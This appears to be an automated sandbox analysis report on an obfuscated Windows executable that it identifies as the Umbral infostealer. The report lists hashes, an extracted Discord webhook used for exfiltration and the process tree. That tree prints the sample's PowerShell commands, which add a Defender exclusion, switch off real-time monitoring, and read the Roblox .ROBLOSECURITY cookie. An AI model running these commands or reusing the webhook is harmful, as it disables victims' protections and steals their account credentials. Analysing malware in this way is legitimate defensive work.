Analysis
-
max time kernel
7s -
max time network
19s -
platform
windows10-2004_x64 -
resource
win10v2004-20231023-en -
resource tags
arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system -
submitted
05-11-2023 03:19
General
-
Target
ConsoleApplication1.obf.exe
-
Size
424KB
-
MD5
9764ad0ba2c14105efa6cb7462beda58
-
SHA1
40c717e44479d0460a2b1789dbaf61a648b038a9
-
SHA256
52770ec8f2e84b3e264870a7533286670e61bff2c8932f0cd6cc1f60af3323ae
-
SHA512
d5a5313f377d17a21ec485b6e8ef6ccc02864b4cda1e8c4d47c790a60e3f0430a8fdf482fcfe116b52fb063f298abd594ff9167c68ffda23f0c69fb84d299309
-
SSDEEP
6144:hY2cJFqVZloZM9rIkd8g+EtXHkv/iD4ZZACl98e1mbiB8BOaedF6IxI:OpJFqVroZOL+EP8h7nuMawF6
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1170536634891128902/hdNxkvpSxRXfW2ouud2imDE8eFbcAfoi3fBBxpcoRyxI8E-rxHT7NHLuI-Q-ThYq7M3H
Signatures
-
Detect Umbral payload 3 IoCs
resource yara_rule behavioral1/files/0x0008000000022d1a-6.dat family_umbral behavioral1/files/0x0008000000022d1a-8.dat family_umbral behavioral1/memory/1232-9-0x000001CAB1DD0000-0x000001CAB1E10000-memory.dmp family_umbral -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe -
Executes dropped EXE 2 IoCs
pid Process 2668 aJWTG7XmdTpodQAaYnZxLv6pA5Dqot49.exe 1232 PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 43 ip-api.com -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\System32\Speech\aJWTG7XmdTpodQAaYnZxLv6pA5Dqot49.exe ConsoleApplication1.obf.exe File created C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe ConsoleApplication1.obf.exe File opened for modification C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe attrib.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2328 powershell.exe 2328 powershell.exe 4192 powershell.exe 4192 powershell.exe 2840 powershell.exe 2840 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1232 PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe Token: SeDebugPrivilege 2328 powershell.exe Token: SeDebugPrivilege 4192 powershell.exe Token: SeDebugPrivilege 2840 powershell.exe -
Suspicious use of WriteProcessMemory 13 IoCs
description pid Process procid_target PID 2584 wrote to memory of 2668 2584 ConsoleApplication1.obf.exe 89 PID 2584 wrote to memory of 2668 2584 ConsoleApplication1.obf.exe 89 PID 2584 wrote to memory of 2668 2584 ConsoleApplication1.obf.exe 89 PID 2584 wrote to memory of 1232 2584 ConsoleApplication1.obf.exe 91 PID 2584 wrote to memory of 1232 2584 ConsoleApplication1.obf.exe 91 PID 1232 wrote to memory of 836 1232 PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe 92 PID 1232 wrote to memory of 836 1232 PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe 92 PID 1232 wrote to memory of 2328 1232 PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe 94 PID 1232 wrote to memory of 2328 1232 PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe 94 PID 1232 wrote to memory of 4192 1232 PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe 97 PID 1232 wrote to memory of 4192 1232 PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe 97 PID 1232 wrote to memory of 2840 1232 PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe 100 PID 1232 wrote to memory of 2840 1232 PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe 100 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 836 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ConsoleApplication1.obf.exe"C:\Users\Admin\AppData\Local\Temp\ConsoleApplication1.obf.exe"1⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Windows\System32\Speech\aJWTG7XmdTpodQAaYnZxLv6pA5Dqot49.exeC:\Windows\System32\Speech\aJWTG7XmdTpodQAaYnZxLv6pA5Dqot49.exe2⤵
- Executes dropped EXE
PID:2668
-
-
C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exeC:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1232 -
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe"3⤵
- Drops file in System32 directory
- Views/modifies file attributes
PID:836
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Windows\System32\Speech\PFjCYKvY6iOmt1PXsCUkvtRGoBX7DypU.exe'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4192
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2840
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵PID:2372
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵PID:4432
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:3208
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:2560
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵PID:2660
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD5b3ae619d7b2e604c5cda175980a9e909
SHA17fc9e9750d42637f9a663a4e143ccf8666249d02
SHA25664ea1d41f18f3e3a3bef881901858bd8fed54f52d801521f9a3686073683b500
SHA512bc72d169b668e759168b08e753591e81bf8fd08a41b7b14522bbc071ebc16548af231ad4a49385df31c690fa456a7b27c1f3554a80acc0a99e877c6717b377e0
-
Filesize
944B
MD52e907f77659a6601fcc408274894da2e
SHA19f5b72abef1cd7145bf37547cdb1b9254b4efe9d
SHA256385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
SHA51234fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721
-
Filesize
948B
MD5a4d919c0b86abb8726889c70aa684ce6
SHA10c3d34a077526faea0c816b083d6b1594839aac8
SHA256b40885d7d80c8b07f2b227cca9848c856257713d908f303390eb3c5b2ee4241a
SHA5129af2bab67d210df0e710141123b4dc6e0613e5becdc2e58264d3f81ccad195d4b3f963f6dca71ebda40f26a0d57b9c730183d6b470fac677c8199890417423b9
-
Filesize
1KB
MD5b0a78e60bfb279d18fd3d6e7a67411f5
SHA19344fe3654a14bc66afb9dc6ea215fabfbe5c906
SHA256a28890c82033d3deaf5770ecd1b0239c77321acc93704b1d4b1e167b91e30aeb
SHA5129548be23bec645cd705482f78d43b63659e38cf879c34f7071f42fd86ee02039379a5e92fbe0f1c74c12aaebabdd8002f57eba111d3e855cbd0c89a110e346f2
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
227KB
MD5ef2711e9aeeb23297016ef32b46a3c7e
SHA1ba51f478c1118d7803620367cb97ce2ceba52a5a
SHA2562fe65b8585389b60e44f688f755bbaefe5a3689737050a96c7586bd9b69a9759
SHA5123c5453a308f0f8321141c2949540f7c3a7c9774eb9e8767210ee30e9745caee0e8bafa8806736f1ec04bd952aa411a5a38a6c97fe19bea3d8d86729571a7059f
-
Filesize
227KB
MD5ef2711e9aeeb23297016ef32b46a3c7e
SHA1ba51f478c1118d7803620367cb97ce2ceba52a5a
SHA2562fe65b8585389b60e44f688f755bbaefe5a3689737050a96c7586bd9b69a9759
SHA5123c5453a308f0f8321141c2949540f7c3a7c9774eb9e8767210ee30e9745caee0e8bafa8806736f1ec04bd952aa411a5a38a6c97fe19bea3d8d86729571a7059f
-
Filesize
11KB
MD5cebf7458dceffcbb81a290cf045beb27
SHA198c74fa610995d61d2ee78a2ea888e003e9f436d
SHA25697d22321ba783bf6d2119320d38d776bbc6bef42fe3dadecf512e23bbdd29660
SHA512144f0da1e8060e08340f1b349f7bbb17be298ee3d27d056d5603143125b8a9d7abb9485d0f5a2a26e2e50f0d5970ecf5fc3a9e665eece70414c6dc1504b04a91